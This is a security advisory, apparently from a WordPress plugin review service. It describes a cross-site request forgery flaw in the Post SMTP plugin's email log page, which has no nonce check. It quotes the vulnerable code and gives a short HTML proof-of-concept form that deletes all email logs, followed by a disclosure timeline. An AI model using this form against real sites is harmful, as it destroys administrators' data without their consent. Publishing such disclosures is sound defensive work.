16 Aug

Cross-Site Request Forgery (CSRF) Vulnerability in Post SMTP

As part of the security review of the plugin Post SMTP that we did after it was selected for a review by our customers we found the plugin contains a cross-site request forgery (CSRF) vulnerability that would cause all of the plugin’s email logging to be deleted.

The plugin’s Email Log admin page is accessible to those with the plugin’s MANAGE_POSTMAN_CAPABILITY_LOGS:

305
$page = add_submenu_page( PostmanViewController::POSTMAN_MENU_SLUG, $pageTitle, $pluginName, Postman::MANAGE_POSTMAN_CAPABILITY_LOGS, 'postman_email_log', array( $this, 'postman_render_email_page' ) );

By default only Administrators have that.

When accessing that page the function postman_render_email_page() is called, which in turn calls the function prepare_items():

336
337
338
339
340
341
342
function postman_render_email_page() {
 
	// Create an instance of our package class...
	$testListTable = new PostmanEmailLogView();
	wp_enqueue_script( 'postman_resend_email_script' );
	// Fetch, prepare, sort, and filter our data...
	$testListTable->prepare_items();

In that function if the POST input “postman_trash_all” exists all of the log files will be deleted:

351
352
353
if ( isset( $_POST['postman_trash_all'] ) ) {
	foreach ( $posts->posts as $post ) {
		wp_delete_post( $post->ID, true );

No check for a valid nonce is done before that happens, so an attacker could cause a logged in Administrator to cause the deletion to happen without them intending it.

Proof of Concept

The following proof of concept will delete all of the email logging.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=postman_email_log" method="POST">
<input type="hidden" name="postman_trash_all" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

8/5/2019 – Developer notified.


Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.